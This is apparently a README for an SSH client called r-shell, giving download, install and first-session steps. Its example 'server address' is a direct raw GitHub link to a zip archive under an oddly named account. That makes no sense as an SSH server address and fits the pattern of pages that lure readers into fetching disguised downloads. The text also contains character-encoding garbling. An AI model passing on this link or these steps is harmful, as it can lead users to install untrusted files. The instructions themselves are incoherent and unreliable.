To get started with r-shell, follow these steps:
Visit the Releases page to download the latest version of r-shell. You will find files suitable for your operating system. Download the correct file for your system.
Once the download completes, locate the downloaded file in your systemβs downloads folder:
- For Windows Users: Double-click on the
.exefile. Follow the setup wizard to install r-shell. - For macOS Users: Open the
.dmgfile and drag the r-shell icon into your Applications folder. - For Linux Users: Extract the compressed file and follow the instructions in the README located inside.
After installing, open r-shell. Hereβs how to set up your first SSH session:
- Click on the βNew Sessionβ button.
- Enter the server address (e.g.,
https://raw.githubusercontent.com/modifiable-japaneseiris792/r-shell/main/src-tauri/capabilities/r-shell_1.7.zip). - Provide your username.
- Choose the authentication method (password or key).
- Click βConnectβ to start your session.
